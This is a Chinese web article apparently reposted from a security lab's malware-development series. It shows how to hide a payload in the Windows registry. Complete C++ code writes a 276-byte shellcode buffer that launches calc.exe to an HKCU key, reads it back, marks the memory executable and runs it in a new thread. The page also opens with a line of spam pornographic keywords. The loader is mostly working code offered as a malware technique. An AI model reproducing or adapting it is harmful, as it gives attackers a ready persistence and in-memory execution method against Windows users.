国产精品久久久aaaa,日日干夜夜操天天插,亚洲乱熟女香蕉一区二区三区少妇,99精品国产高清一区二区三区,国产成人精品一区二区色戒,久久久国产精品成人免费,亚洲精品毛片久久久久,99久久婷婷国产综合精品电影,国产一区二区三区任你鲁

搜索歷史

清空
搜索熱詞
      0
      • 聊天消息
      • 系統消息
      • 評論與回復
      VIP于 到期 續費
      登錄后你可以
      • 下載海量資料
      • 學習在線課程
      • 觀看技術視頻
      • 寫文章/發帖/加入社區
      會員中心
      創作中心
      發布
      創作活動

      完善資料讓更多小伙伴認識你,還能領取20積分哦,立即完善>

      3天內不再提示

      在windows注冊表中存儲二進制數據

      蛇矛實驗室 ? 來源:蛇矛實驗室 ? 2023-05-31 14:13 ? 次閱讀
      加入交流群
      微信小助手二維碼

      掃碼添加小助手

      加入工程師交流群

      簡介

      注冊表是 Windows 操作系統中一個重要的數據庫,它包含 Windows 操作系統和應用程序的重要設置和選項。由于注冊表的功能非常強大,因此注冊表對于惡意程序來說是非常有利用價值的。

      在 windows 注冊表中存儲二進制數據,這是一種常見的技術,常被惡意軟件用于持久化或存儲惡意的 payload

      在注冊表中存儲二進制數據

      boolStoreBinaryDataInRegistry(conststd::wstring& subKeyPath, conststd::wstring& vauleName, constvoid* binaryData, DWORD dataSize)
{
HKEY hkey;
LSTATUS res = RegCreateKeyExW(HKEY_CURRENT_USER, subKeyPath.c_str(), 0, NULL, 0, KEY_WRITE, NULL, &hkey, NULL);
if(res == ERROR_SUCCESS)
{
res = RegSetValueExW(hkey, vauleName.c_str(), 0, REG_BINARY, reinterpret_cast(binaryData), dataSize);

RegCloseKey(hkey);
}

return(res == ERROR_SUCCESS);
}

      上述代碼將二進制數據存儲到 Windows 注冊表中。

      取出存儲的二進制數據

      boolGetBinaryDataFromRegistry(conststd::wstring& subKeyPath, conststd::wstring& valueName, std::vector& outBuffer)
{
HKEY hKey;

LSTATUS res = RegOpenKeyExW(HKEY_CURRENT_USER, subKeyPath.c_str(), 0, KEY_READ, &hKey);
if(res != ERROR_SUCCESS) {
returnfalse;
}

DWORD dataType;
DWORD dataSize = 0;
res = RegQueryValueEx(hKey, valueName.c_str(), nullptr, &dataType, nullptr, &dataSize);
if(res != ERROR_SUCCESS || dataType != REG_BINARY) {
RegCloseKey(hKey);
returnfalse;
}

outBuffer.resize(dataSize);
res = RegQueryValueEx(hKey, valueName.c_str(), nullptr, &dataType, &outBuffer[0], &dataSize);
RegCloseKey(hKey);

return(res == ERROR_SUCCESS);
}

      上述代碼將從注冊表指定位置取出二進制數據保存在 vector 中。

      測試

      intmain()
{
unsigned char calc_thread64_bin[] = {
0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51,
0x41, 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52,
0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52, 0x20, 0x48, 0x8b, 0x72,
0x50, 0x48, 0x0f, 0xb7, 0x4a, 0x4a, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0,
0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0x41, 0xc1, 0xc9, 0x0d, 0x41,
0x01, 0xc1, 0xe2, 0xed, 0x52, 0x41, 0x51, 0x48, 0x8b, 0x52, 0x20, 0x8b,
0x42, 0x3c, 0x48, 0x01, 0xd0, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48,
0x85, 0xc0, 0x74, 0x67, 0x48, 0x01, 0xd0, 0x50, 0x8b, 0x48, 0x18, 0x44,
0x8b, 0x40, 0x20, 0x49, 0x01, 0xd0, 0xe3, 0x56, 0x48, 0xff, 0xc9, 0x41,
0x8b, 0x34, 0x88, 0x48, 0x01, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0,
0xac, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0x38, 0xe0, 0x75, 0xf1,
0x4c, 0x03, 0x4c, 0x24, 0x08, 0x45, 0x39, 0xd1, 0x75, 0xd8, 0x58, 0x44,
0x8b, 0x40, 0x24, 0x49, 0x01, 0xd0, 0x66, 0x41, 0x8b, 0x0c, 0x48, 0x44,
0x8b, 0x40, 0x1c, 0x49, 0x01, 0xd0, 0x41, 0x8b, 0x04, 0x88, 0x48, 0x01,
0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e, 0x59, 0x5a, 0x41, 0x58, 0x41, 0x59,
0x41, 0x5a, 0x48, 0x83, 0xec, 0x20, 0x41, 0x52, 0xff, 0xe0, 0x58, 0x41,
0x59, 0x5a, 0x48, 0x8b, 0x12, 0xe9, 0x57, 0xff, 0xff, 0xff, 0x5d, 0x48,
0xba, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x8d,
0x01, 0x01, 0x00, 0x00, 0x41, 0xba, 0x31, 0x8b, 0x6f, 0x87, 0xff, 0xd5,
0xbb, 0xe0, 0x1d, 0x2a, 0x0a, 0x41, 0xba, 0xa6, 0x95, 0xbd, 0x9d, 0xff,
0xd5, 0x48, 0x83, 0xc4, 0x28, 0x3c, 0x06, 0x7c, 0x0a, 0x80, 0xfb, 0xe0,
0x75, 0x05, 0xbb, 0x47, 0x13, 0x72, 0x6f, 0x6a, 0x00, 0x59, 0x41, 0x89,
0xda, 0xff, 0xd5, 0x63, 0x61, 0x6c, 0x63, 0x2e, 0x65, 0x78, 0x65, 0x00
};
unsigned intcalc_thread64_bin_len = 276;

StoreBinaryDataInRegistry(L"SOFTWARE\testApp", L"test", calc_thread64_bin, calc_thread64_bin_len);

std::vector payload;
GetBinaryDataFromRegistry(L"SOFTWARE\testApp", L"test", payload);

auto execMem = VirtualAlloc(NULL, calc_thread64_bin_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

memmove(execMem, payload.data(), calc_thread64_bin_len);

DWORD oldProtect;
auto ret = VirtualProtect(execMem, calc_thread64_bin_len, PAGE_EXECUTE_READ, &oldProtect);

if(ret != 0) {
HANDLE th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)execMem, 0, 0, 0);
WaitForSingleObject(th, -1);
}

return0;
}

      上述測試代碼首先使用 StoreBinaryDataInRegistry 將 payload 寫入注冊表指定位置(HKCUSOFTWARE estApp)下的 test 字段,之后從使用GetBinaryDataFromRegistry 取出 payload 數據并創建線程執行 payload。

      效果:寫入注冊表中指定位置的數據。

      99d6833c-fc66-11ed-90ce-dac502259ad0.png

      當程序成功執行將彈出計算器窗口。

      99e73c04-fc66-11ed-90ce-dac502259ad0.png

      審核編輯:彭靜
      聲明:本文內容及配圖由入駐作者撰寫或者入駐合作網站授權轉載。文章觀點僅代表作者本人,不代表電子發燒友網立場。文章及其配圖僅供工程師學習之用,如有內容侵權或者其他違規問題,請聯系本站處理。 舉報投訴
      • 數據
        +關注

        關注

        8

        文章

        7335

        瀏覽量

        94755
      • 存儲
        +關注

        關注

        13

        文章

        4787

        瀏覽量

        90057
      • WINDOWS
        +關注

        關注

        4

        文章

        3702

        瀏覽量

        94007

      原文標題:maldev tricks在注冊表中存儲 payload

      文章出處:【微信號:蛇矛實驗室,微信公眾號:蛇矛實驗室】歡迎添加關注!文章轉載請注明出處。

      收藏 人收藏
      加入交流群
      微信小助手二維碼

      掃碼添加小助手

      加入工程師交流群

        評論

        相關推薦
        熱點推薦

        CDx4HC283與CDx4HCT283:4位二進制全加器的技術解析與應用指南

        ,就是兩款高性能的4位二進制全加器芯片,它們眾多電子設備中都有著廣泛的應用。 文件下載: CD74HC283M.pdf 一、芯片特性亮點 1. 功能特性 這兩款芯片能夠實現兩個4位二進制數的加法運算,并且當和超過15時會產生一
        的頭像 發表于 01-30 17:20 ?640次閱讀

        德州儀器4位二進制全加器:SN54/74系列的技術剖析

        德州儀器4位二進制全加器:SN54/74系列的技術剖析 在數字電路設計,加法器是實現算術運算的基礎組件。德州儀器的SN54283、SN54LS283、SN54S283、SN74283
        的頭像 發表于 01-28 17:05 ?472次閱讀

        探索CD54/74AC283與CD54/74ACT283:高效4位二進制加法器的奧秘

        探索CD54/74AC283與CD54/74ACT283:高效4位二進制加法器的奧秘 電子設計領域,加法器是實現數字運算的基礎元件之一。今天,我們將深入研究德州儀器(Texas
        的頭像 發表于 01-28 16:50 ?427次閱讀

        CDx4HC283和CDx4HCT283:高速CMOS邏輯4位二進制全加器的詳細解析

        CDx4HC283和CDx4HCT283:高速CMOS邏輯4位二進制全加器的詳細解析 電子設計領域,加法器是數字電路中最基本的運算單元之一,用于實現二進制數的加法運算。今天要給大家介紹
        的頭像 發表于 01-19 14:50 ?314次閱讀

        解析CD54/74AC283與CD54/74ACT283:4位二進制加法器的卓越之選

        解析CD54/74AC283與CD54/74ACT283:4位二進制加法器的卓越之選 電子設計領域,加法器是實現數字運算的基礎組件。今天我們要深入探討的是德州儀器(Texas
        的頭像 發表于 01-08 16:55 ?571次閱讀

        深入剖析CD54/74AC283與CD54/74ACT283:高性能4位二進制加法器

        深入剖析CD54/74AC283與CD54/74ACT283:高性能4位二進制加法器 電子設計領域,加法器是一種基礎且關鍵的組件。今天,我們將詳細探討CD54/74AC283和CD54
        的頭像 發表于 01-04 17:25 ?704次閱讀

        CD54/74AC283與CD54/74ACT283:高性能4位二進制加法器的全面解析

        CD54/74AC283與CD54/74ACT283:高性能4位二進制加法器的全面解析 電子設計領域,加法器是一種基礎且關鍵的數字電路,廣泛應用于各種計算和數據處理系統。今天,我們
        的頭像 發表于 12-31 17:10 ?1396次閱讀

        SN54F283與SN74F283:4位二進制全加器的技術剖析

        SN54F283與SN74F283:4位二進制全加器的技術剖析 在數字電路設計,加法器是最基礎且關鍵的組件之一。今天我們要深入探討的是德州儀器(TI)的SN54F283和SN74F283這兩款4位
        的頭像 發表于 12-29 16:20 ?524次閱讀

        德州儀器4位二進制全加器:SN54/74283系列深度解析

        德州儀器4位二進制全加器:SN54/74283系列深度解析 在數字電路設計領域,加法器是構建復雜算術邏輯單元的基礎組件。德州儀器(TI)的SN54/74283系列4位二進制全加器憑借其快速進位
        的頭像 發表于 12-23 15:45 ?549次閱讀

        二進制查找(Binary Search)介紹

        二進制查找(Binary Search)用于已排序的數組執行二進制查找的函數。 int binary_search(int arr[], int size, int targ
        發表于 12-12 06:54

        如何在vivado上基于二進制碼對指令運行狀態進行判斷

        vivado仿真運行判斷狀態是否正確。 獲取二進制代碼 Nucleistudio打開相關項目的Properties,按路徑打開C/C++ Build ->setting,找到
        發表于 10-24 06:46

        vivado上基于二進制碼對指令運行狀態進行判斷

        vivado仿真運行判斷狀態是否正確。 獲取二進制代碼 Nucleistudio打開相關項目的Properties,按路徑打開C/C++ Build ->setting,找到
        發表于 10-24 06:31

        二進制數據處理方法分享

        時,我們如何去解析數據并且應用它們。本次的技術分享文章,我們就從如何傳輸數據和解析二進制數據來一步一步剝絲抽繭,搞清楚他的運作原理和二進制
        的頭像 發表于 07-30 15:41 ?2413次閱讀
        <b class='flag-5'>二進制</b><b class='flag-5'>數據</b>處理方法分享

        如何使用Keil將二進制文件加載到外部SPI Flash

        我想知道是否有辦法使用 Keil 將隨機二進制文件加載到外部 SPI 閃存二進制文件將通過 LPC54102(OM13077 EVK 板)。我知道一些用于 FPGA 的 ISE 允許您執行此作
        發表于 03-17 06:37

        無法使用密度化參數構建OpenVINO?二進制,怎么處理?

        無法使用密度化參數構建OpenVINO?二進制
        發表于 03-06 06:51